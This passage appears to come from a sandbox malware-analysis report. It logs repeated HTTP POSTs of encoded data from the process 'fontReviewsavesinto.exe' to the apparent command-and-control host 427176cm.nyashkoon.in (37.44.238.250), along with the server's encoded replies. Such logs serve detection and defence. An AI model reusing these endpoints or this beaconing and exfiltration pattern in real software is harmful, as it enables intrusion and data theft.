                                        Data Ascii: [ZCSY^Z\^^TUVRZZ_RYXR]R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$"#0%Y%"';;^*%0Z$<*=!$?)3=?$+*&G!']*
                                        Nov 5, 2024 08:13:09.276842117 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:09.355849028 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        60 | 192.168.2.7 | 50030 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:09.497219086 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:09.849540949 CET1032OUTData Raw: 5e 58 46 59 5c 5a 5a 57 5e 5e 54 55 56 53 5a 5d 5f 52 59 5c 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XFY\ZZW^^TUVSZ]_RY\RZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@$T$Z0-2$'8+=C8X%,;_(-5'6$'$^'*&G!']*
                                        Nov 5, 2024 08:13:10.311350107 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:10.382385015 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        61 | 192.168.2.7 | 50031 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:10.531526089 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:10.880650043 CET1032OUTData Raw: 5e 5d 43 5e 59 5d 5a 5d 5e 5e 54 55 56 5b 5a 51 5f 52 59 58 52 5f 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C^Y]Z]^^TUV[ZQ_RYXR_RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$!33>&0" ,($=?%<7=..Q0,2]0=?]$;Z)*&G!']*#
                                        Nov 5, 2024 08:13:11.373348951 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:11.450525045 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        62 | 192.168.2.7 | 50032 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:11.569096088 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1024
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:11.927396059 CET1024OUTData Raw: 5e 5f 46 5e 5c 59 5a 57 5e 5e 54 55 56 5a 5a 59 5f 50 59 5f 52 5a 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_F^\YZW^^TUVZZY_PY_RZR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%2/'[%0;,];);08)."Q'%0=Y'7\**&G!']*+


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        63 | 192.168.2.7 | 50033 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:12.214864969 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:12.568048000 CET1300OUTData Raw: 5e 5f 43 52 5c 5d 5a 53 5e 5e 54 55 56 5b 5a 59 5f 5a 59 5d 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_CR\]ZS^^TUV[ZY_ZY]RZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A'Y'!^32,;)C<_$*-*T3$$8#*&G!']*#
                                        Nov 5, 2024 08:13:13.018845081 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:13.102416992 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 00 25 28 0a 13 34 3a 35 0d 28 00 05 00 35 09 09 59 2f 13 37 04 25 30 28 54 2b 3c 32 1b 23 2a 2e 59 21 3d 2c 5d 37 3d 33 10 3d 0b 2f 5a 07 10 25 1e 26 22 0d 1e 25 3e 20 5b 25 23 3c 03 2a 12 3c 10 36 02 2c 04 25 3b 21 13 26 3a 3b 51 3b 07 32 0f 2e 2b 3f 5d 2e 21 3c 5e 32 1e 2c 54 0d 10 3a 0b 3d 22 28 1c 29 3c 1b 5e 25 19 37 0c 34 13 06 03 3f 39 3c 19 28 5b 3d 07 33 09 3b 0e 21 54 2e 0a 31 28 3b 05 30 32 34 1a 24 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(4:5(5Y/7%0(T+<2#*.Y!=,]7=3=/Z%&"%> [%#<*<6,%;!&:;Q;2.+?].!<^2,T:="()<^%74?9<([=3;!T.1(;024$2%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        64 | 192.168.2.7 | 50034 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:12.335807085 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:12.692996979 CET1032OUTData Raw: 5e 59 46 59 59 5b 5a 51 5e 5e 54 55 56 59 5a 5d 5f 5a 59 50 52 5a 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YFYY[ZQ^^TUVYZ]_ZYPRZR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F$;$1'+,8,Y=C4Y3$)[50/-$ 380>&G!']*+
                                        Nov 5, 2024 08:13:13.146820068 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:13.229721069 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        65 | 192.168.2.7 | 50035 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:13.351840973 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:13.708748102 CET1032OUTData Raw: 5b 5d 43 59 59 55 5f 56 5e 5e 54 55 56 53 5a 58 5f 50 59 59 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYU_V^^TUVSZX_PYYRYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F'" ':%!?8$Y)X3<*=3"0[;$?=&G!']*
                                        Nov 5, 2024 08:13:14.164968967 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:14.235750914 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        66 | 192.168.2.7 | 50036 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:14.366493940 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:14.724436998 CET1032OUTData Raw: 5b 5b 43 5f 59 5c 5f 51 5e 5e 54 55 56 52 5a 59 5f 57 59 5f 52 59 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[C_Y\_Q^^TUVRZY_WY_RYR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C'T$Y$9^'1',(Y)?3?*>)$,'?%($)&G!']*
                                        Nov 5, 2024 08:13:15.185641050 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:15.262294054 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        67 | 192.168.2.7 | 50037 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:15.382910967 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:15.739856958 CET1032OUTData Raw: 5b 5a 46 58 59 5a 5f 57 5e 5e 54 55 56 5d 5a 5d 5f 50 59 51 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZFXYZ_W^^TUV]Z]_PYQR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$(3=&%!'-($>&4X$Z?*&P'&_3='^ =&G!']*
                                        Nov 5, 2024 08:13:16.224509001 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:16.304879904 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        68 | 192.168.2.7 | 50038 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:16.428505898 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:17.240402937 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:17.311666012 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        69 | 192.168.2.7 | 50039 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:17.446203947 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        70 | 192.168.2.7 | 50040 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:18.121412039 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:18.935084105 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:19.007200956 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        71 | 192.168.2.7 | 50041 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:18.240391970 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:19.059637070 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:19.143359900 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        72 | 192.168.2.7 | 50042 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:19.272088051 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:20.091939926 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:20.166161060 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:18 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        73 | 192.168.2.7 | 50043 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:20.289836884 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:21.109777927 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:21.182967901 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        74 | 192.168.2.7 | 50044 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:21.303086996 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:22.113213062 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:22.182364941 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        75 | 192.168.2.7 | 50045 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:22.303754091 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:23.133924961 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:23.215356112 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        76 | 192.168.2.7 | 50046 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:23.336884975 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        77 | 192.168.2.7 | 50047 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:24.028347015 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:24.849895954 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:24.929048061 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        78 | 192.168.2.7 | 50048 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:24.149802923 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:24.971544027 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:25.049376011 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        79 | 192.168.2.7 | 50049 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:25.178421021 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
